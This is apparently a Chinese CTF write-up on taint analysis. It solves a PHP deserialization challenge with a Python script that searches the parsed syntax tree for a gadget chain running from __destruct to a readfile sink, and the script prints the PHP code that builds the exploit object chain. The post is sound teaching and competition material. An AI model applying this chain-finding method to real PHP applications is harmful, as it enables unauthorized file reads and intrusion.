【技術分享】從一道題淺談污點分析
#前言
之前在強網杯做過一道popmaster,在打SCTF又遇到這種類型的題目,簡單總結一下這類題目的思路和一些暴力取巧的做法。
#污點分析概念
舉一個簡單的例子
eval(md5($_POST['a']));
在這個例子中,顯然我們一眼就可以看出來
如果使用傳統的正則攔截/eval\(.+\$_(POST|GET)\[.+\].+\)/,肯定是會造成誤報的
然而從程序執行流的角度分析
我們的惡意數據從$_POST['a']輸入,經過md5函數的處理,到達eval函數
如果沒有經過md5處理,那么我們認為這是一個webshell,如果經過md5處理,那么我們認為這個eval是無效的
在這個例子中我們就引入了污點分析
污點分析可以抽象成一個三元組的形式,其中,source 即污點源,代表直接引入不受信任的數據或者機密數據到系統中;sink即污點匯聚點,代表直接產生安全敏感操作(違反數據完整性)或者泄露隱私數據到外界(違反數據保密性);sanitizer即無害處理,代表通過數據加密或者移除危害操作等手段使數據傳播不再對軟件系統的信息安全產生危害.污點分析就是分析程序中由污點源引入的數據是否能夠不經無害處理,而直接傳播到污點匯聚點.如果不能,說明系統是信息流安全的;否則,說明系統產生了隱私數據泄露或危險數據操作等安全問題.
其中$_POST['a']為source,eval()為sink,md5就是無害化處理的sanitizer
對于php反序列化漏洞這種鏈式漏洞來說,污點分析的效果是很好的,比如可以把__destruct/__toString作為sink,類的各種方法作為跳板,最后執行到某個類的危險方法完成利用。SCTF的 FUMO_on_the_Christmas_tree就是一個例子
#題目分析
為了方便以后有更高級的方法復現,這里留了個檔
https://gist.github.com/EkiXu/3d29315909dc05b6fa71bc672f44bd1b
題目給的類很多,但是因為是隨機生成的,肯定是在一定的模板基礎上進行變換。根據觀察我們可以歸納出幾種類
source
class IuAzWYx {
public object $KmORdvBb;
public function __destruct() { if (is_callable([$this->KmORdvBb, 'V32HUHODH'])) @$this->KmORdvBb->V32HUHODH($_GET['uGvREuF']); }}
有__destruct魔術方法,肯定是我們的入口類也是就source了
中間類1
class dSvm6INp {
public object $NxxDUWG;
public function __call($name,$value) { extract([$name => 'LuRyao']); if (is_callable([$this->NxxDUWG, $iYRFwB9SQE])) call_user_func([$this->NxxDUWG, $iYRFwB9SQE], ...$value); }}
對于反序列化只關注 method 能到達的分支
class eh14yT {
public object $QNgdAf0PIi; public object $KS1V49;
public function WPcnd8eIc4($yu4o2GBgF) { @$yu4o2GBgF = base64_decode($yu4o2GBgF); if (is_callable([$this->QNgdAf0PIi, 'MoogQTgtd'])) @$this->QNgdAf0PIi->MoogQTgtd($yu4o2GBgF); if (is_callable([$this->KS1V49, 'xnsgfXPVM'])) @$this->KS1V49->xnsgfXPVM($yu4o2GBgF); }}
對于這個類的WPcnd8eIc4方法我們發現能到達 MoogQTgtd 方法和xnsgfXPVM 方法
因為每個方法名都是唯一的,我們只需要關注所有的function 語法樹
可以抽象出節點
Node: parent: lastNode children: - xnsgfXPVM - MoogQTgtd funcName: WPcnd8eIc4 className: eh14yT fromObj: xxx operation: xxx
中間類2
class dSvm6INp {
public object $NxxDUWG;
public function __call($name,$value) { extract([$name => 'LuRyao']); if (is_callable([$this->NxxDUWG, $iYRFwB9SQE])) call_user_func([$this->NxxDUWG, $iYRFwB9SQE], ...$value); }}
對于他的調用方式一定是 xxx->iYRFwB9SQE() 然后轉到 $this->NxxDUWG->LuRyao() 那么實際上__call = iYRFwB9SQE
因此可以同樣抽象成為
Node: parent: lastNode children: - LuRyao funcName: iYRFwB9SQE className: dSvm6INp fromObj:xxx
sink
class xyRFyIcPw2 {
public object $wdXqOvQVN;
public function IvQQWGgFBF($SQuW0dv9yk) { if(stripos($SQuW0dv9yk, "/fumo") === 0) readfile(strtolower($SQuW0dv9yk)); }}
這種類涉及到readfile這種危險操作,可以把他作為sink
#“土法”分析
為了更好的分析程序執行流,這里直接使用phpPaser來生成ast樹
require_once "vendor/autoload.php";use PhpParser\Error;use PhpParser\NodeDumper;use PhpParser\ParserFactory;
$code = file_get_contents($argv[1]);
$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);try { $ast = $parser->parse($code);} catch (Error $error) { echo "Parse error: {$error->getMessage()}"; return;}
echo json_encode($ast, JSON_PRETTY_PRINT), "";
其實phpParser也支持ast vistor,但是我對python比較熟悉,接下來所以導出語法樹json給python使用
然后我們的思想也很土法暴力,就是從source開始,匹配所有可能的children,進行bfs,最后當到達sink時,停止查找并輸出exp
同上面我們抽象的得到的構造搜索的狀態節點如下
class Node: def __init__(self,parent:"Node",funcName:str,className:str,fromObj:str,operation:str="") -> None: self.parent:"Node" = parent self.funcname = funcName self.className = className self.children:Set[Node] = {} self.fromObj = fromObj self.operation = operation def __repr__(self) -> str: return f"Class:{self.className} Func:{self.funcname}"
不過這里的children其實沒用上,用parent就能描述這棵搜索樹了
然后就是bfs 加上了幾種剪枝方法,這部分改寫自popmaster。其實這種類型的題目都是通用的,因為我們的方法比較暴力,實際上并沒有執行流,而是通過分析ast結構匹配不同的語句,所以遇到不同的模板要針對性的剪枝,當然也可以根據不想要的方法名進行剪枝,以及避免循環加一個訪問過的標記剪枝。
while not q.empty(): cur:Node = q.get() #print(cur) #循環剪枝 if hasattr(visit_function,cur.className+"::"+cur.funcname): continue else: visit_function[cur.className+"::"+cur.funcname] = True
#黑名單剪枝 if cur.funcname in ban_function: continue
if cur.funcname in know_children.keys(): for fromObj,child in know_children[cur.funcname]: q.put(Node(cur,child,f2cTable[child],fromObj)) continue
cur_function_ast = functions_ast[cur.funcname] nxt_function = ''
if len(cur_function_ast['params']) > 0: cur_param_name = cur_function_ast['params'][0]['var']['name']
'''對于 public function RXSpM5x($gEhgFIW) { @$gEhgFIW = str_rot13($gEhgFIW); if (is_callable([$this->vV0AU2p, 'OUIxcaUx'])) @$this->vV0AU2p->OUIxcaUx($gEhgFIW); } ''' #遍歷當前函數方法 for stmt in cur_function_ast['stmts']: # xxx; if stmt['nodeType'] == 'Stmt_Expression': expr = stmt['expr']
if expr['nodeType'] == 'Expr_ErrorSuppress': expr = stmt['expr']['expr']
if expr['nodeType'] == "Expr_Assign" and expr['var']['name'] == cur_param_name: #@$Cz9slGovKv = md5($Cz9slGovKv); 剪枝 if expr['expr']['nodeType'] == 'Expr_FuncCall': iexpr = expr['expr'] if get_funccall_name(iexpr) in ['md5','sha1','crypt','base64_encode']: break else: cur.operation += get_funccall_name(iexpr) # @$DP1 = $WE; 剪枝 elif expr['expr']['nodeType'] == 'Expr_Variable' and expr['expr']['name'] != cur_param_name: break
# 對于if (is_callable([$this->WShwfIFWB, 'GoPpYf35GF'])) @$this->WShwfIFWB->GoPpYf35GF($Cz9slGovKv); elif stmt['nodeType'] == 'Stmt_If': if stmt['cond']['nodeType'] == "Expr_FuncCall":
if get_funccall_name(stmt['cond']) == 'is_callable': for istmt in stmt['stmts']: if istmt['nodeType'] == "Stmt_Expression": param_name = istmt['expr']['expr']['var']['name']['name'] nxt_function_name = istmt['expr']['expr']['name']['name'] #print(param_name) q.put(Node(cur,nxt_function_name,f2cTable[nxt_function_name],param_name)) #到達 if(stripos($ZVuRXoI, "/fumo") === 0) readfile(strtolower($ZVuRXoI)); 也即sink elif stmt['cond']['nodeType'] == 'Expr_BinaryOp_Identical': left = stmt['cond']['left'] if get_funccall_name(left) == 'stripos': #Ok print("Ok") printGraph(cur) printExp(cur) exit(0)
#print(curState.className,'->',f2cTable[next_f]) #exit(0)
可以看到這里還有個known_children集,是因為對_call函數處理的方法比較特殊
for name,ast in classes_ast.items(): for f in ast["stmts"]: if f['nodeType'] == "Stmt_ClassMethod": class_method_name = f['name']['name'] children_method_name = None fromObj = None if class_method_name == '__call': # extract([$name => 'nglEtPMT']); for stmt in f['stmts']: if stmt['nodeType'] == 'Stmt_Expression': expr = stmt['expr'] if expr['nodeType'] == 'Expr_FuncCall' and expr['name']['parts'][0]=='extract': children_method_name = expr['args'][0]['value']['items'][0]['value']['value'] fromObj = ast['stmts'][0]['props'][0]['name']['name']
elif stmt['nodeType'] == 'Stmt_If' and get_funccall_name(stmt['cond']) == 'is_callable': expr = stmt['cond'] class_method_name = expr['args'][0]['value']['items'][1]['value']['name'] break if fromObj!=None and children_method_name!=None: know_children[class_method_name] = [(fromObj,children_method_name)]
f2cTable[class_method_name] = name functions_ast[class_method_name] = f
還是剛才這個例子
class dSvm6INp {
public object $NxxDUWG;
public function __call($name,$value) { extract([$name => 'LuRyao']); if (is_callable([$this->NxxDUWG, $iYRFwB9SQE])) call_user_func([$this->NxxDUWG, $iYRFwB9SQE], ...$value); }}
對于我們直接在語法樹中取LuRyao為下個節點的方法,并將這個__call等價為iYRFwB9SQE,直接計算其children
為了方便通過函數名反查類名,以及自動打印exp,我們還需要一些其他工具
完整腳本如下
import jsonimport queuefrom typing import Set
root_ast = json.load(open('res.json','rb'))
class_ast = root_ast[0]["stmts"]
classes_ast = {}
def get_funccall_name(expr): if expr['nodeType'] == "Expr_FuncCall": return expr['name']['parts'][0] print(expr) raise Exception("Not FunCall")
class Node: def __init__(self,parent:"Node",funcName:str,className:str,fromObj:str,operation:str="") -> None: self.parent:"Node" = parent self.funcname = funcName self.className = className self.children:Set[Node] = {} self.fromObj = fromObj self.operation = operation def __repr__(self) -> str: return f"Class:{self.className} Func:{self.funcname}"
def gen_decode_exp(encode_way): if encode_way == 'base64_decode': return 'base64_encode' elif encode_way == 'strrev': return 'strrev' elif encode_way == 'str_rot13': return 'str_rot13' elif encode_way == 'base64_encode': return 'base64_decode' elif encode_way == 'ucfirst': return 'lcfirst' else: print("Unkown Encode Way",encode_way) return ""
def printGraph(sink:Node)->bool: cur = sink decode_exp = '"/flag"' while True: print(f"{cur.className}::{cur.funcname} [{cur.operation}]<-",end='') cur = cur.parent if cur == None: break if cur.operation != "": decode_exp = f"{gen_decode_exp(cur.operation)}({decode_exp})" print('') print(decode_exp)
def printExp(cur:Node): ret = f"$my{cur.className} = new \christmasTree\{cur.className};\r" for stmt in classes_ast[cur.className]['stmts']: if stmt['nodeType'] == 'Stmt_Property': propName = stmt['props'][0]['name']['name'] ret += f"$my{cur.className}->{propName} = new StdClass;\r" parent:Node = cur.parent while parent != None: tmp = f"$my{parent.className} = new \christmasTree\{parent.className};\r" for stmt in classes_ast[parent.className]['stmts']: if stmt['nodeType'] == 'Stmt_Property': propName = stmt['props'][0]['name']['name'] tmp += f"$my{parent.className}->{propName} = new StdClass;\r" tmp += f"$my{parent.className}->{cur.fromObj} = $my{cur.className};\r" cur = parent parent = parent.parent ret +=tmp print(ret)
for i in range(len(class_ast)): classes_ast[class_ast[i]['name']['name']] = class_ast[i]
#根據f反查classf2cTable = {}#ban_function = ['YkN508','frZNkk','N3R1ow','N3R1ow','CCO4GN','LCG9b8','ILnKZX']
ban_function = []
know_children = {}
functions_ast = {}
for name,ast in classes_ast.items(): for f in ast["stmts"]: if f['nodeType'] == "Stmt_ClassMethod": class_method_name = f['name']['name'] children_method_name = None fromObj = None if class_method_name == '__call': # extract([$name => 'nglEtPMT']); for stmt in f['stmts']: if stmt['nodeType'] == 'Stmt_Expression': expr = stmt['expr'] if expr['nodeType'] == 'Expr_FuncCall' and expr['name']['parts'][0]=='extract': children_method_name = expr['args'][0]['value']['items'][0]['value']['value'] fromObj = ast['stmts'][0]['props'][0]['name']['name']
elif stmt['nodeType'] == 'Stmt_If' and get_funccall_name(stmt['cond']) == 'is_callable': expr = stmt['cond'] class_method_name = expr['args'][0]['value']['items'][1]['value']['name'] break if fromObj!=None and children_method_name!=None: know_children[class_method_name] = [(fromObj,children_method_name)]
f2cTable[class_method_name] = name functions_ast[class_method_name] = f
#print(f2cTable)#print(know_children)#exit(0)
visit_function = {}
q = queue.SimpleQueue()
initState = Node(None,"__destruct",f2cTable['__destruct'],None)
q.put(initState)
while not q.empty(): cur:Node = q.get() #print(cur) #循環剪枝 if hasattr(visit_function,cur.className+"::"+cur.funcname): continue else: visit_function[cur.className+"::"+cur.funcname] = True
#黑名單剪枝 if cur.funcname in ban_function: continue
if cur.funcname in know_children.keys(): for fromObj,child in know_children[cur.funcname]: q.put(Node(cur,child,f2cTable[child],fromObj)) continue
cur_function_ast = functions_ast[cur.funcname] nxt_function = ''
if len(cur_function_ast['params']) > 0: cur_param_name = cur_function_ast['params'][0]['var']['name']
''' public function RXSpM5x($gEhgFIW) { @$gEhgFIW = str_rot13($gEhgFIW); if (is_callable([$this->vV0AU2p, 'OUIxcaUx'])) @$this->vV0AU2p->OUIxcaUx($gEhgFIW); } ''' #遍歷當前函數方法 for stmt in cur_function_ast['stmts']: # xxx; if stmt['nodeType'] == 'Stmt_Expression': expr = stmt['expr']
if expr['nodeType'] == 'Expr_ErrorSuppress': expr = stmt['expr']['expr']
if expr['nodeType'] == "Expr_Assign" and expr['var']['name'] == cur_param_name: #@$Cz9slGovKv = md5($Cz9slGovKv); if expr['expr']['nodeType'] == 'Expr_FuncCall': iexpr = expr['expr'] if get_funccall_name(iexpr) in ['md5','sha1','crypt','base64_encode']: break else: cur.operation += get_funccall_name(iexpr) # @$DP1 = $WE; elif expr['expr']['nodeType'] == 'Expr_Variable' and expr['expr']['name'] != cur_param_name: break
# if (is_callable([$this->WShwfIFWB, 'GoPpYf35GF'])) @$this->WShwfIFWB->GoPpYf35GF($Cz9slGovKv); elif stmt['nodeType'] == 'Stmt_If': if stmt['cond']['nodeType'] == "Expr_FuncCall":
if get_funccall_name(stmt['cond']) == 'is_callable': for istmt in stmt['stmts']: if istmt['nodeType'] == "Stmt_Expression": param_name = istmt['expr']['expr']['var']['name']['name'] nxt_function_name = istmt['expr']['expr']['name']['name'] #print(param_name) q.put(Node(cur,nxt_function_name,f2cTable[nxt_function_name],param_name)) # if(stripos($ZVuRXoI, "/fumo") === 0) readfile(strtolower($ZVuRXoI)); elif stmt['cond']['nodeType'] == 'Expr_BinaryOp_Identical': left = stmt['cond']['left'] if get_funccall_name(left) == 'stripos': #Ok print("Ok") printGraph(cur) printExp(cur) exit(0)
#print(curState.className,'->',f2cTable[next_f]) #exit(0)
效果如下



后話
對于這類污點分析,codeql是比較好用的工具,但是受限于php的靈活性(比如在這個例子中比較搞的extract和_call魔術方法),codeql并沒有支持php。因此在比賽中使用了比較暴力的方法進行分析。希望本篇文章拋磚引玉,更夠學習到大佬們更高妙的方法。
參考資料
簡單理解污點分析技術:https://www.k0rz3n.com/2019/03/01/%E7%AE%80%E5%8D%95%E7%90%86%E8%A7%A3%E6%B1%A1%E7%82%B9%E5%88